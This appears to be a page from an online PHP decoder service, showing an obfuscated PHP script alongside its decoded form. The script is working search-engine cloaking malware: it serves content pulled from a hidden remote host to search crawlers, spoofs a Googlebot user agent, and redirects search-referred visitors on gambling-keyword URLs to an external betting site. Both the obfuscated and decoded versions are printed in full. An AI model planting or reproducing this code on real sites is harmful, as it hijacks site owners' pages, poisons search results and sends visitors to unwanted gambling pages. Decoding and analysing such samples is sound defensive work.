Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto VcmkQ48a0p; Pi5uthPwx6: echo getContents(host . "\x3f\170\x68\x6f\163\x74\75"..

Decoded Output download

<?php 
 goto VcmkQ48a0p; Pi5uthPwx6: echo getContents(host . "?xhost=" . $ym . "&reurl=" . URI . "&ua=Baiduspider" . "&f=bd"); exit; b0X5KKq5Ez: goto hLSUr0IkKc; XdN3phJe0J: header("Location: https://br.googleeplay.com/kebet.html"); exit; GjifH0uqkF: goto YeLpYrYVDq; baJ6HfBolS: goto YKEFdg7wFO; yKUKDDsTIa: $ref = $_SERVER["HTTP_REFERER"]; $key = $_SERVER["HTTP_USER_AGENT"]; $ym = $_SERVER["HTTP_HOST"]; if (isEngines($key)) { goto baJ6HfBolS; } if (!(isIncludes() && isRef($ref))) { goto GjifH0uqkF; } goto XdN3phJe0J; YKEFdg7wFO: header("Content-Type:text/html;charset=utf-8"); if (isIncludes()) { goto jSWMcnEmP4; } echo file_get_contents(host . "suijiurl/index.php"); goto b0X5KKq5Ez; jSWMcnEmP4: goto Pi5uthPwx6; VcmkQ48a0p: set_time_limit(0); error_reporting(0); header("Content-Type: text/html;charset=utf-8"); define("URI", $_SERVER["REQUEST_URI"]); define("host", base64_decode("aHR0cHM6Ly9jZG4uY2xvdWRmbGFyZWJyLmNvbS8=")); goto pBpeMPXSuQ; pBpeMPXSuQ: define("MULU", "app|ios|android|download|blank|bet|casino|games|play|video|poker|root|news"); function isEngines($key) { return stristr($key, "Googlebot") !== false || stristr($key, "Bingbot") !== false || stristr($key, "Yahoo!") !== false; } function isIncludes() { $re = 0; $temp = explode("|", MULU); foreach ($temp as $v) { if (!(stristr(URI, $v) !== false)) { goto Nj0jjyfdKc; } $re = 1; Nj0jjyfdKc: fy4QJS_i7r: } tyOBMLu0aT: return $re; } function isRef($ref) { return stristr($ref, "google") !== false || stristr($ref, "bing") !== false || stristr($ref, "yahoo") !== false; } function getContents($url) { goto bdnj7cr1xf; bdnj7cr1xf: if (function_exists("curl_init")) { goto w318tqqZbr; } return file_get_contents($url); goto qEl8lFRaxG; w318tqqZbr: $ch = curl_init(); goto EsYsXD9eH4; aYEm8aQLUk: curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); $result = curl_exec($ch); curl_close($ch); if (!($result == NULL)) { goto Uzm2y10sGZ; } return file_get_contents($url); goto zhPbgiexEH; zhPbgiexEH: Uzm2y10sGZ: return $result; qEl8lFRaxG: goto EnXvVOA6XJ; EsYsXD9eH4: curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); goto aYEm8aQLUk; EnXvVOA6XJ: } goto yKUKDDsTIa; hLSUr0IkKc: YeLpYrYVDq: ?>

Did this file decode correctly?

Original Code

<?php
 goto VcmkQ48a0p; Pi5uthPwx6: echo getContents(host . "\x3f\170\x68\x6f\163\x74\75" . $ym . "\46\x72\145\165\162\x6c\75" . URI . "\46\x75\141\75\x42\141\151\144\x75\x73\x70\x69\x64\145\162" . "\x26\x66\x3d\142\x64"); exit; b0X5KKq5Ez: goto hLSUr0IkKc; XdN3phJe0J: header("\114\x6f\143\x61\x74\x69\x6f\156\x3a\40\150\164\x74\x70\x73\x3a\57\57\x62\x72\x2e\147\x6f\x6f\x67\154\x65\145\160\154\141\171\x2e\x63\157\155\x2f\153\x65\142\x65\x74\x2e\150\x74\x6d\x6c"); exit; GjifH0uqkF: goto YeLpYrYVDq; baJ6HfBolS: goto YKEFdg7wFO; yKUKDDsTIa: $ref = $_SERVER["\x48\x54\x54\120\137\x52\x45\x46\x45\x52\105\122"]; $key = $_SERVER["\110\x54\124\120\137\125\x53\x45\122\x5f\x41\107\x45\x4e\x54"]; $ym = $_SERVER["\110\x54\124\x50\137\x48\x4f\x53\x54"]; if (isEngines($key)) { goto baJ6HfBolS; } if (!(isIncludes() && isRef($ref))) { goto GjifH0uqkF; } goto XdN3phJe0J; YKEFdg7wFO: header("\103\x6f\x6e\164\145\x6e\164\55\x54\x79\160\145\72\164\x65\170\164\57\x68\x74\155\x6c\73\143\150\x61\x72\x73\x65\x74\x3d\165\164\146\x2d\x38"); if (isIncludes()) { goto jSWMcnEmP4; } echo file_get_contents(host . "\163\x75\x69\x6a\151\x75\x72\x6c\57\151\x6e\144\145\x78\x2e\160\x68\160"); goto b0X5KKq5Ez; jSWMcnEmP4: goto Pi5uthPwx6; VcmkQ48a0p: set_time_limit(0); error_reporting(0); header("\103\157\x6e\164\x65\x6e\x74\55\124\x79\x70\x65\x3a\40\164\x65\x78\x74\x2f\x68\164\155\x6c\x3b\x63\x68\141\x72\163\145\164\75\165\164\146\55\x38"); define("\125\122\111", $_SERVER["\122\105\121\x55\x45\123\124\137\125\122\x49"]); define("\150\x6f\x73\164", base64_decode("\x61\x48\x52\x30\143\x48\115\66\114\x79\x39\152\132\107\x34\x75\131\62\170\166\144\127\122\x6d\x62\x47\106\x79\132\127\x4a\171\x4c\x6d\x4e\166\x62\123\70\x3d")); goto pBpeMPXSuQ; pBpeMPXSuQ: define("\115\125\x4c\125", "\x61\160\x70\174\151\x6f\x73\x7c\141\156\x64\x72\x6f\151\144\174\144\157\167\156\x6c\157\141\144\174\142\154\141\x6e\153\174\x62\x65\164\x7c\143\141\163\x69\156\x6f\x7c\x67\x61\155\145\163\174\160\x6c\x61\x79\174\x76\x69\x64\145\157\x7c\160\x6f\x6b\145\x72\x7c\162\157\157\164\x7c\x6e\x65\x77\x73"); function isEngines($key) { return stristr($key, "\107\157\x6f\147\x6c\145\x62\x6f\164") !== false || stristr($key, "\102\151\x6e\x67\142\157\164") !== false || stristr($key, "\131\x61\150\x6f\157\41") !== false; } function isIncludes() { $re = 0; $temp = explode("\174", MULU); foreach ($temp as $v) { if (!(stristr(URI, $v) !== false)) { goto Nj0jjyfdKc; } $re = 1; Nj0jjyfdKc: fy4QJS_i7r: } tyOBMLu0aT: return $re; } function isRef($ref) { return stristr($ref, "\x67\157\157\147\x6c\145") !== false || stristr($ref, "\142\x69\156\147") !== false || stristr($ref, "\x79\x61\150\157\157") !== false; } function getContents($url) { goto bdnj7cr1xf; bdnj7cr1xf: if (function_exists("\143\x75\x72\154\x5f\x69\156\x69\x74")) { goto w318tqqZbr; } return file_get_contents($url); goto qEl8lFRaxG; w318tqqZbr: $ch = curl_init(); goto EsYsXD9eH4; aYEm8aQLUk: curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); $result = curl_exec($ch); curl_close($ch); if (!($result == NULL)) { goto Uzm2y10sGZ; } return file_get_contents($url); goto zhPbgiexEH; zhPbgiexEH: Uzm2y10sGZ: return $result; qEl8lFRaxG: goto EnXvVOA6XJ; EsYsXD9eH4: curl_setopt($ch, CURLOPT_USERAGENT, "\115\x6f\172\151\154\x6c\x61\x2f\65\56\x30\x20\50\143\x6f\155\160\x61\x74\x69\142\x6c\x65\73\40\x47\x6f\x6f\x67\154\145\142\x6f\x74\57\62\x2e\61\x3b\x20\53\x68\164\164\x70\72\x2f\57\167\x77\x77\x2e\x67\x6f\157\x67\x6c\x65\x2e\143\157\x6d\57\x62\157\x74\56\x68\x74\x6d\154\51"); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); goto aYEm8aQLUk; EnXvVOA6XJ: } goto yKUKDDsTIa; hLSUr0IkKc: YeLpYrYVDq:

Function Calls

None

Variables

None

Stats

MD5 1e65f3d6cf3e58865c4897e3c00fc609
Eval Count 0
Decode Time 47 ms